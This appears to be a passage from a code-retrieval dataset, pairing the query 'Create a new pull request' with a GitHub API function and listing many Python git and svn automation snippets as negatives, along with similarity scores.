'\\n'\n self._print(message)\n self._exit(message_1)\n return_code = self._set_tracking_branch(remote, branch)\n if return_code != 0:\n self._exit(colored(' - Failed to set tracking branch', 'red'))", "def checkout(branch=\"lf-dev\"):\n with cd(FOLDER):\n sudo('git fetch', user='tomcat')\n sudo('git checkout %s' % branch, user='tomcat')\n status()", "async def push(\n app: AppIdentity,\n repo: str,\n branch: str,\n sha: str,\n name: str,\n output_title: str,\n output_summary: Optional[str],\n output: Optional[str],\n):\n repo = RepoName.parse(repo)\n output = load_job_output(output_title, output_summary, output)\n\n async with aiohttp.ClientSession(\n headers=await app.installation_headers(repo.owner)) as sesh:\n\n if not sha:\n logging.info(\"Resolving branch sha: %s\", branch)\n ref_url = (\n f\"https://api.github.com\"\n f\"/repos/{repo.owner}/{repo.repo}/git/refs/heads/{branch}\"\n )\n logging.debug(ref_url)\n resp = await sesh.get(ref_url)\n logging.info(resp)\n sha = (await resp.json())[\"object\"][\"sha\"]\n\n action = checks.CreateRun(\n owner=repo.owner,\n repo=repo.repo,\n run=checks.RunDetails(\n head_branch=branch,\n head_sha=sha,\n name=name,\n status=checks.Status.in_progress,\n output = output,\n ))\n\n async with action.execute(sesh) as resp:\n logging.debug(resp)\n\n try:\n resp.raise_for_status()\n except Exception:\n logging.exception((await resp.json())[\"message\"])\n raise\n\n print(await resp.json())", "def pull(self, remote, branch, *args):\n return self.cmd('pull', remote, branch, *args)", "def update(self, co_dir):\n self.run_task(' 
'.join(['svn', 'up', co_dir]))\n pass", "def cmd_update(self):\n self.update_repository()\n results = self.results.getvalue()\n if results:\n print('---')\n print(results, end='')", "def validate_sha_github(sha):\n r = requests.head(github_changeset_url % sha)\n return r.status_code == 200", "def git_pull():\n\n puts(yellow(\"Pull master from GitHub\"))\n with cd(env.source_dir):\n run('git reset --hard HEAD')\n run('git pull')", "def update_last_manifest(self, manifest_sha):\n\n self.db.upsert_documents(\n {'last-manifest': {'latest_sha': manifest_sha}}\n )", "def update(self, commit, **kwargs):\n self._pkg_changes(commit=self.commit, **kwargs)\n self.commit = commit", "def update_repo(self, sign=True, verbose=False):\n self.ensure_correct_user()\n\n keyname=self.read_keyname()\n self.show(f'cd {self.repo_path}')\n os.chdir(self.repo_path)\n cmds=[\n 'apt-ftparchive packages . > Packages',\n 'gzip -c Packages > Packages.gz',\n 'apt-ftparchive release . > Release',\n ]\n for cmd in cmds:\n self.show(cmd)\n s=call(cmd, shell=True)\n if s!=0:\n print('error:', cmd, file=sys.stderr)\n return 1\n self.report('Updated Packages and Release.')\n if sign:\n s = self.sign_release(keyname)\n self.report('Updated repo:', self.repo_path)\n return s", "def bump_upstream_sources(**kwargs):\n\n # Find out current tracking branch to bump\n # the services matching the branch:\n oa_folder = kwargs['workdir'] + '/openstack-ansible'\n try:\n remote_branch = tracking_branch_name(oa_folder)\n except ValueError as verr:\n raise SystemExit(verr)\n\n LOGGER.info(\"Each file can take a while to update.\")\n prevline = {}\n reporegex = re.compile('(?P<project>.*)_git_repo: (?P<remote>.*)')\n branchregex = re.compile(('(?P<project>.*)_git_install_branch: '\n '(?P<sha>[0-9a-f]{40}) '\n '# HEAD of \"(?P<branch>.*)\" '\n 'as of .*'))\n\n update_files = glob.glob(\n \"{}/playbooks/defaults/repo_packages/*.yml\".format(oa_folder))\n\n stable_branch_skips = [\n \"openstack_testing.yml\",\n \"nova_consoles.yml\",\n ]\n\n for filename in update_files:\n if remote_branch.startswith(\"stable/\") and \\\n os.path.basename(filename) in stable_branch_skips:\n LOGGER.info(\"Skipping {} for stable branch\".format(filename))\n continue\n LOGGER.info(\"Updating {}\".format(filename))\n for line in fileinput.input(filename, inplace=True):\n rrm = reporegex.match(line)\n if rrm:\n # Extract info of repo line (previous line)\n # for branch line (current line)\n prevline['project'] = rrm.group('project')\n prevline['remote'] = rrm.group('remote')\n print(branchregex.sub(\n lambda x: bump_project_sha_with_comments(x, prevline), line)),\n\n LOGGER.info(\"All files patched !\")\n msg = (\"Update all SHAs for {next_release}\\n\\n\"\n \"This patch updates all the roles to the latest available stable \\n\"\n \"SHA's, copies the release notes from the updated roles into the \\n\"\n \"integrated repo, updates all the OpenStack Service SHA's, and \\n\"\n \"updates the appropriate python requirements pins. \\n\\n\"\n \"Depends-On: {release_changeid}\").format(\n next_release=os.environ.get('next_release', '<NEW VERSION>'),\n release_changeid=os.environ.get('release_changeid', '<TODO>'),)\n if kwargs['commit']:\n repo = Repo(oa_folder)\n repo.git.add('.')\n repo.index.commit(msg)\n click.echo(\"Commit done. 
Please verify before review.\")\n else:\n click.echo(\"Here is a commit message you could use:\\n\")\n click.echo(msg)", "def pull(self):\n run('git', 'pull', 'origin', 'master')", "def pull_build_project(project, branch=\"master\"):\n repo_result, pull_log = pull(project.path, app.config[\"SSH_PRIVATE\"], branch)\n if repo_result:\n newjob = create_job(project, pull_log)\n settings = abcparse(os.path.join(project.path, \"build.abc\"))\n build(newjob, project, settings[\"windows\"]) #TODO: Handle configs", "def download(repo_url, sha, working_dir):\n print 'Downloading %s ...' % (sha)\n sf_zip = os.path.join(working_dir, 'sf.gz')\n with open(sf_zip, 'wb+') as f:\n f.write(requests.get(github_api(repo_url) + '/zipball/' + sha).content)\n zip_file = ZipFile(sf_zip)\n zip_file.extractall(working_dir)\n zip_file.close()\n\n for name in zip_file.namelist():\n if name.endswith('/src/'):\n src_dir = name\n break\n\n return os.path.join(working_dir, src_dir)", "def update_directory(dir):\n print('Updating {dir}...'.format(dir=dir))\n os.chdir(dir)\n status = 1\n tries = 0\n # Keep trying to git pull until success, or until tries = 30\n while status != 0:\n status = os.system('sudo git pull')\n tries += 1\n if status != 0:\n print('Trying again. Attempt {0} out of 30.'.format(tries))\n if tries == 30:\n break\n if status == 0:\n print('Succeeded.')\n else:\n print('Failed after 30 tries.')", "def update():\n require('PROJECT_NAME')\n\n with cd(utils.home('apps', env.PROJECT_NAME)):\n run('hg pull')\n run('hg up')", "def _make_release_branch(self):\n user = getpass.getuser()\n if not user == self._user:\n raise Error('the command should only be run as user %s' % self._user)\n branch = self._branch\n # get the latest master updates\n subprocess.check_call('git remote update', shell=True)\n subprocess.check_call('git checkout master', shell=True)\n # does a git pull and updates the submodules\n GitUtil.update_submodules()\n # get the latest commit before the release is cut\n self._latest_commit = GitUtil.get_latest_commit()\n print 'Making release branch %s' % branch\n # create the new release branch\n GitUtil.create_branch(branch)\n print TermColor.ColorStr('Created remote branch %s' % branch, 'GREEN')", "def update():\n siteconfig = configparser.RawConfigParser()\n siteconfig.readfp(open(\"/etc/gitzillarc\"))\n sRepo = os.getcwd()\n\n logger = get_logger(siteconfig)\n oBugRegex = get_bug_regex(siteconfig)\n sRefPrefix = get_or_default(siteconfig, sRepo, \"git_ref_prefix\")\n sSeparator = get_or_default(siteconfig, sRepo, \"separator\")\n\n bRequireBugNumber = to_bool(get_or_default(siteconfig, sRepo, \"require_bug_ref\", True))\n asAllowedStatuses = None\n if has_option_or_default(siteconfig, sRepo, \"allowed_bug_states\"):\n asAllowedStatuses = [x.strip() for x in get_or_default(siteconfig, sRepo, \"allowed_bug_states\").split(\",\")]\n\n # and the bugzilla info.\n userconfig = configparser.RawConfigParser()\n userconfig.read(os.path.expanduser(\"~/.gitzillarc\"))\n (sBZUrl, sBZUser, sBZPasswd) = get_bz_data(siteconfig, userconfig)\n\n gitzilla.hooks.update(oBugRegex, asAllowedStatuses, sSeparator, sBZUrl,\n sBZUser, sBZPasswd, logger, None, sRefPrefix,\n bRequireBugNumber)", "def bump_upstream_repos_shas():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--path\",\n help=\"path to the folder containing YAML files to update with new SHAs\",\n default=\"playbooks/defaults/repo_packages/\",\n )\n args = parser.parse_args()\n\n releasing.bump_upstream_repos_shas(args.path)", "def 
_switchBranch(self, release):\n if release is None:\n self.branch = None\n self.branch_dir = None\n log.info('No release branch available')\n else:\n self.wc.update()\n assert self.wc.exists('branches/' + release)\n io.linesToFile(self.path(self.BRANCH_FILE), [release])\n self.branch = release\n self.branch_dir = 'branches/' + release\n self.wc.update(self.branch_dir, depth='infinity')\n log.info('Working on branch ' + self.branch)", "def generate_patch_files(sha_list: List[str], start_version: int) -> PatchList:\n upstream_dir = paths.TOOLCHAIN_LLVM_PATH\n fetch_upstream_once()\n result = PatchList()\n for sha in sha_list:\n if len(sha) < 40:\n sha = get_full_sha(upstream_dir, sha)\n file_path = paths.SCRIPTS_DIR / 'patches' / 'cherry' / f'{sha}.patch'\n assert not file_path.exists(), f'{file_path} already exists'\n with open(file_path, 'w') as fh:\n check_call(f'git format-patch -1 {sha} --stdout',\n stdout=fh, shell=True, cwd=upstream_dir)\n\n commit_subject = check_output(\n f'git log -n1 --format=%s {sha}', shell=True, cwd=upstream_dir)\n comment = '[UPSTREAM] ' + commit_subject.strip()\n rel_patch_path = f'cherry/{sha}.patch'\n end_version = sha_to_revision(sha)\n result.append(PatchItem(comment, rel_patch_path, start_version, end_version))\n return result", "def brew_update():\n subprocess.run([\"brew\", \"update\"], check=True, capture_output=True)", "def pull_svn_rev(log_entry, svn_url, target_url, svn_path, original_wc, keep_author=False):\r\n svn_rev = log_entry['revision']\r\n run_svn([\"up\", \"--ignore-externals\", \"-r\", svn_rev, original_wc])\r\n\r\n removed_paths = []\r\n merged_paths = []\r\n unrelated_paths = []\r\n commit_paths = []\r\n for d in log_entry['changed_paths']:\r\n # e.g. u'/branches/xmpp/twisted/words/test/test.py'\r\n p = d['path']\r\n if not p.startswith(svn_path + \"/\"):\r\n # Ignore changed files that are not part of this subdir\r\n if p != svn_path:\r\n unrelated_paths.append(p)\r\n continue\r\n # e.g. u'twisted/words/test/test.py'\r\n p = p[len(svn_path):].strip(\"/\")\r\n # Record for commit\r\n action = d['action']\r\n if action not in 'MARD':\r\n display_error(\"In SVN rev. %d: action '%s' not supported. 
\\\r\n Please report a bug!\" % (svn_rev, action))\r\n \r\n if len (commit_paths) < 100:\r\n commit_paths.append(p)\r\n # Detect special cases\r\n old_p = d['copyfrom_path']\r\n if old_p and old_p.startswith(svn_path + \"/\"):\r\n old_p = old_p[len(svn_path):].strip(\"/\")\r\n # Both paths can be identical if copied from an old rev.\r\n # We treat like it a normal change.\r\n if old_p != p:\r\n if not os.path.exists(p + os.sep + '.svn'):\r\n svn_add_dir(os.path.dirname(p))\r\n run_svn([\"up\", old_p])\r\n run_svn([\"copy\", old_p, p])\r\n if os.path.isfile(p):\r\n shutil.copy(original_wc + os.sep + p, p)\r\n if action == 'R':\r\n removed_paths.append(old_p)\r\n if len (commit_paths) < 100:\r\n commit_paths.append(old_p)\r\n continue\r\n if action == 'A':\r\n if os.path.isdir(original_wc + os.sep + p):\r\n svn_add_dir(p)\r\n else:\r\n p_path = os.path.dirname(p).strip() or '.'\r\n svn_add_dir(p_path)\r\n shutil.copy(original_wc + os.sep + p, p)\r\n run_svn([\"add\", p])\r\n elif action == 'D':\r\n removed_paths.append(p)\r\n else: # action == 'M'\r\n merged_paths.append(p)\r\n\r\n if removed_paths:\r\n for r in removed_paths:\r\n run_svn([\"up\", r])\r\n run_svn([\"remove\", \"--force\", r])\r\n\r\n if merged_paths:\r\n for m in merged_paths:\r\n run_svn([\"up\", m])\r\n m_url = svn_url + \"/\" + m\r\n out = run_svn([\"merge\", \"-c\", str(svn_rev), \"--non-recursive\",\r\n m_url+\"@\"+str(svn_rev), m])\r\n # if conflicts, use the copy from original_wc\r\n if out and out.split()[0] == 'C':\r\n print \"\\n### Conflicts ignored: %s, in revision: %s\\n\" \\\r\n % (m, svn_rev)\r\n run_svn([\"revert\", \"--recursive\", m])\r\n if os.path.isfile(m):\r\n shutil.copy(original_wc + os.sep + m, m)\r\n\r\n if unrelated_paths:\r\n print \"Unrelated paths: \"\r\n print \"*\", unrelated_paths\r\n\r\n ## too many files\r\n if len (commit_paths) > 99:\r\n commit_paths = []\r\n\r\n try:\r\n commit_from_svn_log_entry(log_entry, commit_paths, \r\n keep_author=keep_author)\r\n except ExternalCommandFailed:\r\n # try to ignore the Properties conflicts on files and dirs\r\n # use the copy from original_wc\r\n has_Conflict = False\r\n for d in log_entry['changed_paths']:\r\n p = d['path']\r\n p = p[len(svn_path):].strip(\"/\")\r\n if os.path.isfile(p):\r\n if os.path.isfile(p + \".prej\"):\r\n has_Conflict = True\r\n shutil.copy(original_wc + os.sep + p, p)\r\n p2=os.sep + p.replace('_', '__').replace('/', '_') \\\r\n + \".prej-\" + str(svn_rev)\r\n shutil.move(p + \".prej\", os.path.dirname(original_wc) + p2)\r\n w=\"\\n### Properties conflicts ignored:\"\r\n print \"%s %s, in revision: %s\\n\" % (w, p, svn_rev)\r\n elif os.path.isdir(p):\r\n if os.path.isfile(p + os.sep + \"dir_conflicts.prej\"):\r\n has_Conflict = True\r\n p2=os.sep + p.replace('_', '__').replace('/', '_') \\\r\n + \"_dir__conflicts.prej-\" + str(svn_rev)\r\n shutil.move(p + os.sep + \"dir_conflicts.prej\",\r\n os.path.dirname(original_wc) + p2)\r\n w=\"\\n### Properties conflicts ignored:\"\r\n print \"%s %s, in revision: %s\\n\" % (w, p, svn_rev)\r\n out = run_svn([\"propget\", \"svn:ignore\",\r\n original_wc + os.sep + p])\r\n if out:\r\n run_svn([\"propset\", \"svn:ignore\", out.strip(), p])\r\n out = run_svn([\"propget\", \"svn:externel\",\r\n original_wc + os.sep + p])\r\n if out:\r\n run_svn([\"propset\", \"svn:external\", out.strip(), p])\r\n # try again\r\n if has_Conflict:\r\n commit_from_svn_log_entry(log_entry, commit_paths,\r\n keep_author=keep_author)\r\n else:\r\n raise ExternalCommandFailed", "def 
update_branch_for_legalcode(self, repo, legalcode, branch_object):\n resource_slug = legalcode.license.resource_slug\n self.say(2, f\"\\tUpdating {resource_slug} {legalcode.language_code}\")\n last_tx_update = iso8601.parse_date(\n self.stats[resource_slug][legalcode.language_code][\"translated\"][\n \"last_activity\"\n ]\n )\n legalcode.translation_last_update = last_tx_update\n\n branch_object.legalcodes.add(legalcode)\n if (\n branch_object.last_transifex_update is None\n or branch_object.last_transifex_update < last_tx_update\n ):\n branch_object.last_transifex_update = last_tx_update\n\n # Get the updated translation. We don't write it to a file yet.\n # We'll do all the updates for a branch at once in the next section.\n pofile_path = legalcode.translation_filename()\n pofile_content = self.transifex_get_pofile_content(\n resource_slug, legalcode.language_code\n )\n filenames = save_content_as_pofile_and_mofile(\n pofile_path, pofile_content\n )\n relpaths = [\n os.path.relpath(\n filename, settings.TRANSLATION_REPOSITORY_DIRECTORY\n )\n for filename in filenames\n ]\n repo.index.add(relpaths)", "def set_version(ctx, branch, value):\n\n try:\n\n gh = ctx.obj.github\n\n log.echo('Setting version...', break_line=False)\n bump = gh.set_version(branch=branch, value=value)\n log.checkmark()\n log.echo('Version is now {} (was {})'.format(bump.next_version, bump.prev_version))\n return bump\n except BaseException as _:\n log.xmark()\n raise", "def test_branch_commit_set(repository: Repository) -> None:\n head, heads = repository.head, repository.heads\n heads[\"branch\"] = head.commit\n updatefile(repository.path / \"a\")\n branch = repository.branch(\"branch\")\n branch.commit = head.commit\n assert head.commit == branch.commit", "def update_source():\n\n require('environment', provided_by=env.environments)\n with cd(env.code_root):\n sudo('git pull', user=env.deploy_user)\n sudo('git checkout %(branch)s' % env, user=env.deploy_user)", "def _fetch(self, sha: str) -> None:\n # have multiple threads downloading in parallel\n queue = [sha]\n pending: Set[str] = set()\n downloaded: Set[str] = set()\n input_queue: \"Queue[Union[str, Poison]]\" = Queue() # requesting downloads\n output_queue: \"Queue[Union[str, Poison]]\" = Queue() # completed downloads\n procs = []\n for _ in range(self._processes):\n target = Binder(self, \"_download\")\n args = (input_queue, output_queue)\n # use multiprocessing.dummy to use threads instead of processes\n proc = multiprocessing.dummy.Process(target=target, args=args)\n proc.daemon = True\n proc.start()\n procs.append(proc)\n self._trace(\"\", level=Level.INFO, exact=True) # for showing progress\n done = total = 0\n while queue or pending:\n if queue:\n # if possible, queue up download\n sha = queue.pop()\n if sha in downloaded or sha in pending:\n continue\n if git.object_exists(sha):\n if sha == git.EMPTY_TREE_HASH:\n # git.object_exists() returns True for the empty\n # tree hash even if it's not present in the object\n # store. 
Everything will work fine in this situation,\n # but `git fsck` will complain if it's not present, so\n # we explicitly add it to avoid that.\n git.write_object(\"tree\", b\"\")\n if not git.history_exists(sha):\n # this can only happen in the case of aborted fetches\n # that are resumed later\n self._trace(\"missing part of history from %s\" % sha)\n queue.extend(git.referenced_objects(sha))\n else:\n self._trace(\"%s already downloaded\" % sha)\n else:\n pending.add(sha)\n input_queue.put(sha)\n else:\n # process completed download\n res = output_queue.get()\n if isinstance(res, Poison):\n # _download never puts Poison with an empty message in the output_queue\n assert res.message is not None\n self._fatal(res.message)\n pending.remove(res)\n downloaded.add(res)\n queue.extend(git.referenced_objects(res))\n # show progress\n done = len(downloaded)\n total = done + len(pending)\n pct = int(float(done) / total * 100)\n message = \"\\rReceiving objects: {:3.0f}% ({}/{})\".format(pct, done, total)\n self._trace(message, level=Level.INFO, exact=True)\n if total:\n self._trace(\n \"\\rReceiving objects: 100% ({}/{}), done.\\n\".format(done, total),\n level=Level.INFO,\n exact=True,\n )\n for proc in procs:\n input_queue.put(Poison())\n for proc in procs:\n proc.join()", "def merge(self, branch):\n\n if branch.username != self.username or branch.reponame != self.reponame:\n raise BranchError(\"Branch to merge must be in the same repository\")\n\n context = {\n \"username\": self.username,\n \"reponame\": self.reponame,\n \"name\": self.name\n }\n LOG.debug(\"Merging from %r to %r\" % (branch, self))\n self._client.postjson(path=\"/users/%(username)s/repos/%(reponame)s/\"\n \"branches/%(name)s/merge\" % context,\n payload={\"from_branch\": branch.name})", "def checkout(location, rev):\n ensure_dir(location)\n\n logger = utils.get_logger()\n\n with utils.cd(location):\n logger.debug(\n 'Checking out rev: {} at location: {}'.format(rev, location))\n cmd = '/usr/bin/git checkout --force --quiet {}'.format(rev)\n subprocess.check_call(cmd, shell=True)", "def push_updates():\n check_call(['git', 'push', '--tags', '--force'])", "def gitCheckoutBranch(self, path, branch):\r\n\r\n with workInDirectory(path):\r\n fetch_cmd = [\"git\", \"fetch\"]\r\n if self.verbose:\r\n print(\"Runing Command : {}\".format(\" \".join(fetch_cmd)))\r\n\r\n SubProcessUtility.runCommand(fetch_cmd)\r\n\r\n checkout_branch_command = [\"git\", \"checkout\", branch]\r\n if self.verbose:\r\n print(\"Running Command : {}\".format(\" \".join(checkout_branch_command)))\r\n SubProcessUtility.runCommand(checkout_branch_command)", "def get_repo_branch(self):\n # Load HEAD and find ref.\n with open('{path}HEAD'.format(path=self.workpath), 'rb') as fp:\n ref = fp.read().strip().decode().split(': ')[1]\n\n print('[+] Downloading {}'.format(ref))\n\n # Requests for head hash and save\n head_url = '{base_url}{ref}'.format(base_url=self.base_url, ref=ref)\n data = self._request(head_url).read().strip()\n\n # Save the hash inside the ref file into the target place.\n ref_path = '/'.join(ref.split('/')[:-1])\n if not os.path.exists('{path}{ref_path}'.format(path=self.workpath, ref_path=ref_path)):\n os.makedirs('{path}{ref_path}'.format(path=self.workpath, ref_path=ref_path))\n with open('{path}{ref}'.format(path=self.workpath, ref=ref), 'wb') as fp:\n fp.write(data)\n\n # After get ref->head_hash, why not share it.\n self.head_hash = data.decode()", "def pull(self, verbose=True):\n fetch_cmd = [\"git\", \"fetch\"]\n if not verbose:\n 
fetch_cmd.append(\"-q\")\n subprocess.call(fetch_cmd, cwd=self.path)\n checkout_cmd = [\"git\", \"checkout\", \"origin/master\", \"-B\", \"master\"]\n if not verbose:\n checkout_cmd.append(\"-q\")\n return subprocess.call(checkout_cmd, cwd=self.path)", "def git_branch(self, app, branch):\n if app == self.PROJECT_NAME:\n app_path = self.PROJECT_DIR\n else:\n raise ValueError('Unknown app')\n\n with lcd(app_path):\n self.local('git pull && git checkout %s' % branch)\n\n self.display('%s has been successfully switched to tag/branch %s.' % (app, branch), color='green')", "def svn_notify(self,event):\n # pysvn.wc_notify_action.update_completed\n if event['action'] == pysvn.wc_notify_action.update_completed:\n revision = event['revision']\n self.revision = revision", "def __gitSubmodulesUpdate(self):\n self.vcs.gitSubmoduleUpdate(self.project.getProjectPath())", "def pull(repo_path, ssh, branch=\"master\"):\n ssh_key = os.path.abspath(ssh)\n if platform.system() == \"Windows\":\n ssh_key = \"/\" + ssh_key.replace(\"\\\\\", \"/\").replace(\":\", \"\")\n ssh_cmd = \"ssh -i %s\" % ssh_key\n\n my_repo = git.Repo(repo_path)\n\n pull_output = \"\"\n contributer_emails = list()\n files = list()\n new_commit = False\n\n with my_repo.git.custom_environment(GIT_SSH_COMMAND=ssh_cmd):\n for result in my_repo.remotes.origin.pull(branch):\n if result.commit == my_repo.head.commit:\n continue\n new_commit = True\n contributer_emails.append(result.commit.author.email)\n pull_output += str(result.commit) + \"\\n\"\n pull_output += str(result.commit.author) + \"<\" + str(result.commit.author.email) + \">\\n\"\n pull_output += str(result.commit.committed_datetime) + \"\\n\"\n pull_output += str(result.commit.summary) + \"\\n\"\n pull_output += str(result.commit.stats.total) + \"\\n\\n\"\n\n for stat in result.commit.stats.files: #We write all files at the end of the description\n files.append(stat)\n\n if not new_commit:\n # There were no new changes, we do not need to rebuild.\n return False, \"No new changes\"\n\n pull_output += \"Files changed:\\n\"\n for changes in files:\n pull_output += changes\n\n return True, pull_output", "def validate_commit(ctx, sha, **_):\n\n gh = ctx.obj.github\n ci_provider = ctx.obj.ci_provider\n\n sha = sha or (ci_provider.sha if ci_provider else None)\n\n def _pre_issue():\n log.echo('Commit references an issue...', break_line=False)\n\n def _post_issue():\n log.checkmark()\n\n def _pre_label():\n log.echo('Issue is labeled with a release label...', break_line=False)\n\n def _post_label():\n log.checkmark()\n\n log.echo('Validating commit', add=True)\n\n try:\n gh.validate_commit(sha=sha,\n hooks={\n 'pre_issue': _pre_issue,\n 'pre_label': _pre_label,\n 'post_issue': _post_issue,\n 'post_label': _post_label\n })\n except exceptions.ReleaseValidationFailedException as e:\n log.xmark()\n log.sub()\n tb = sys.exc_info()[2]\n utils.raise_with_traceback(e, tb)\n log.sub()\n\n log.echo('Validation passed')", "def update(ID, **updates):\n # Filter out any None values.\n review_updates = {k:v for k,v in updates.items() if v}\n\n if len(review_updates) > 0:\n data = json_encode(review_updates)\n gh_request('POST', '/repos/:user/:repo/pulls/:id', uri_vars={'id': ID}, body=data)\n printers.print_review_updated()", "def create_branch(ctx, name, sha):\n\n try:\n\n gh = ctx.obj.github\n\n log.echo('Creating branch...', break_line=False)\n branch = gh.create_branch(name=name, sha=sha)\n log.checkmark()\n log.echo('Branch {} created at {}'.format(name, sha))\n return branch\n except BaseException 
as _:\n log.xmark()\n raise" ]
[ "0.62394434", "0.62033707", "0.58707505", "0.5823983", "0.57316476", "0.5548735", "0.54924744", "0.5490744", "0.54566896", "0.53568214", "0.533697", "0.53313905", "0.5318119", "0.5305053", "0.52909243", "0.52125496", "0.5172792", "0.51444185", "0.5125727", "0.5123589", "0.5117004", "0.51135176", "0.5107081", "0.50763315", "0.5057646", "0.5046271", "0.5030426", "0.50106573", "0.49981362", "0.49795562", "0.49613053", "0.49552605", "0.49242672", "0.49159274", "0.4906212", "0.4887669", "0.48787075", "0.48440373", "0.48430702", "0.4826631", "0.4822493", "0.4813265", "0.4785168", "0.47659603", "0.47631398", "0.4759415", "0.4755382", "0.47523403", "0.47321033", "0.4716193", "0.4681286", "0.46703753", "0.46676362", "0.4663845", "0.46367013", "0.4623172", "0.46112978", "0.4604527", "0.45972884", "0.45906225", "0.45803124", "0.4575057", "0.45698196", "0.45605144", "0.45267117", "0.4519026", "0.45127758", "0.45112032", "0.4501685", "0.44947094", "0.44882494", "0.44856942", "0.4482125", "0.44731998", "0.44712391", "0.4467855", "0.4460572", "0.44542435", "0.44469336", "0.44284788", "0.442826", "0.44260177", "0.44251585", "0.44221878", "0.4414698", "0.44058475", "0.44024023", "0.4396537", "0.43931773", "0.43900466", "0.43794128", "0.43735367", "0.43715444", "0.43610686", "0.4360904", "0.4357786", "0.43475527", "0.43448156", "0.4341328", "0.43374324" ]
0.70466286
0
Create a new pull request
def create_pull_request(self, base, head, title, body=None):
    pull_info = {
        'title': title,
        'head': head,
        'base': base
    }
    if body:
        pull_info['body'] = body
    logger.info(pull_info)
    resp = self.post('pulls', json=pull_info)
    try:
        resp.raise_for_status()
    except Exception:
        logger.error(resp.json())
        raise
    return resp.json()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def create_pull_request(filepath, github_account):\n repo = _git.clone_from_github(\n _repo_path(), join(filepath, _repo_name()), github_account=github_account)\n branch = ('update-discovery-artifacts-' +\n datetime.datetime.now().strftime('%Y%m%d-%H%M%S'))\n repo.checkout_new(branch)\n if _update_disco(repo, github_account) > 0:\n repo.push(branch=branch)\n gh = Github(github_account.personal_access_token)\n gh_repo = gh.get_repo(_repo_path())\n pr = gh_repo.create_pull(\n title='chore: autogenerated discovery document update',\n body='',\n base='master',\n head=branch)", "def create(title, head, base='master', message=''):\n review_info = {\n 'title': title,\n 'body': message,\n 'head': head,\n 'base': base,\n }\n\n data = json_encode(review_info)\n review = parse(gh_request('POST', '/repos/:user/:repo/pulls', body=data))\n printers.print_review_created(review)", "def create_or_update_pull_request(jira_url, jira_username, jira_api_key, bitbucket_username, bitbucket_password,\n bitbucket_destination_branch_name, bitbucket_repository_name):\n click.echo('Pull request \"{}\" was created or updated'.format(\n create_or_update_pull_request_func(\n jira_url, jira_username, jira_api_key, bitbucket_username, bitbucket_password,\n bitbucket_destination_branch_name, bitbucket_repository_name\n )\n ))", "def main(assignee, browse, force, file, message, issue, base, head):\n # Above is copy/pasted from `man hub`\n\n branch_ready, error_msg = current_branch_is_pushed()\n if not branch_ready:\n if force:\n click.echo(\"force-opening not yet supported\")\n else:\n raise Exception(error_msg)\n\n assignment_label = get_assignment_label()\n if assignment_label is None:\n raise Exception(\"No label with the text 'review' and without the text 'self' found\")\n\n if not validate_assignee(assignee):\n raise Exception(\"No assignee named {} found\".format(assignee))\n\n if not message and not file:\n message = get_message()\n\n issue_number = create_pull_request(browse, force, file, message, issue, base, head)\n\n if not label_and_assign(issue_number, assignment_label, assignee):\n raise Exception(\"Failed to mark issue {issue_number} with label {label} and assign {assignee}\".format(\n issue_number=issue_number,\n label=assignment_label,\n assignee=assignee\n ))\n\n click.echo('PR opened!')", "def post(self):\n parser = reqparse.RequestParser()\n for arg in self.REQUIRED_ARGUMENTS:\n parser.add_argument(arg)\n parser.add_argument('token') # token is also required but it is checking separately\n args = parser.parse_args()\n\n if not args.get('token'):\n return {'message': 'Missing authorization token'}, 401\n\n if all(args.get(key) for key in self.REQUIRED_ARGUMENTS):\n repo_owner, repo_name = args['repository'].split('/') # full repository name format : 'owner/repo_name'\n\n post_data = {\"title\": args.get('title'),\n \"body\": args.get('body') or \"This is a pull request.\",\n \"head\": '{}:{}'.format(repo_owner, args['changeset']),\n # Regards to Github API documentation, changeset is the branch name\n \"base\": args.get('base')}\n\n headers = {'Authorization': 'Basic ' + args.get('token')}\n r = requests.post(flask.current_app.config['GITHUB_API_CREATE_PULL_REQUEST'].format(owner=repo_owner, repos=repo_name),\n data=json.dumps(post_data), headers=headers)\n\n if r.status_code == 201:\n number = r.json().get('number')\n resp = self._request_reviews(args.get('token'), repo_owner, repo_name, number, args.get('reviewers'))\n\n return resp.json(), r.status_code\n\n return r.json(), r.status_code\n else:\n 
missing_args = set(self.REQUIRED_ARGUMENTS) - {key for key in args.keys() if args.get(key)}\n return {'message': 'Missing required arguments : ' + ','.join(sorted(list(missing_args)))}, 422", "def create(self):\n resp = yield self.client.request(\n self.repo.base_path + \"/pulls\", params={\n \"title\": self.title,\n \"head\": self.head,\n \"base\": self.base,\n \"body\": self.body,\n \"maintainer_can_modify\": self.maintainer_can_modify\n },\n method=\"POST\")\n self.c = resp.data\n self.after_sync()\n self.num = self.c[\"number\"]\n raise gen.Return(self)", "def make_pull_request(\n issue, upstream=None, empty_commit=True, move_card=True, resolves_issue=True\n):\n if empty_commit:\n run_command('git commit --allow-empty -m \"Open Pull Request\"')\n\n subject = \"WIP: {}\".format(issue.subject)\n else:\n subject = issue.subject\n\n push_command = \"git push -u\"\n if upstream:\n push_command += \" {}\".format(upstream)\n\n run_command(push_command)\n\n if resolves_issue:\n action = \"Resolves\"\n else:\n action = \"Contributes to\"\n\n # Open the actual pull request\n message = \"{}\\n\\n{} {}/{}#{}\".format(\n subject, action, issue.owner, issue.repo, issue.issue_number\n )\n run_command('hub pull-request -o -m \"{}\" --edit'.format(message), _fg=True)\n\n if move_card:\n move_card_column(issue.issue_number, \"feedback\")", "def create_pull(self, title, head, base, body, # pylint: disable=R0913\n maintainer_can_modify=False):\n pull = self.make(PullRequest, self, 0)\n pull.title = title\n pull.head = head\n pull.base = base\n pull.body = body\n pull.maintainer_can_modify = maintainer_can_modify\n return pull.create()", "def issue_create():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"-a\", \"--assignees\", default=[], nargs=\"*\", help=\"users to assign to this issue\"\n )\n parser.add_argument(\"-b\", \"--body\", default=None, help=\"text body of the issue\")\n parser.add_argument(\n \"-c\",\n \"--column\",\n default=DEFAULT_COLUMN_NAME,\n help=\"name of column to place card in\",\n )\n parser.add_argument(\n \"-i\",\n \"--interactive\",\n action=\"store_true\",\n default=DEFAULT_COLUMN_NAME,\n help=\"Edit issue title and body in vim\",\n )\n parser.add_argument(\n \"-l\", \"--labels\", default=None, nargs=\"*\", help=\"labels to add to the new issue\"\n )\n parser.add_argument(\n \"-m\",\n \"--milestone\",\n default=None,\n help=\"milestone id to place this issue in. \"\n \"This should be an integer. \"\n \"Find milestone ids with the `milestones` command.\",\n )\n parser.add_argument(\n \"-p\", 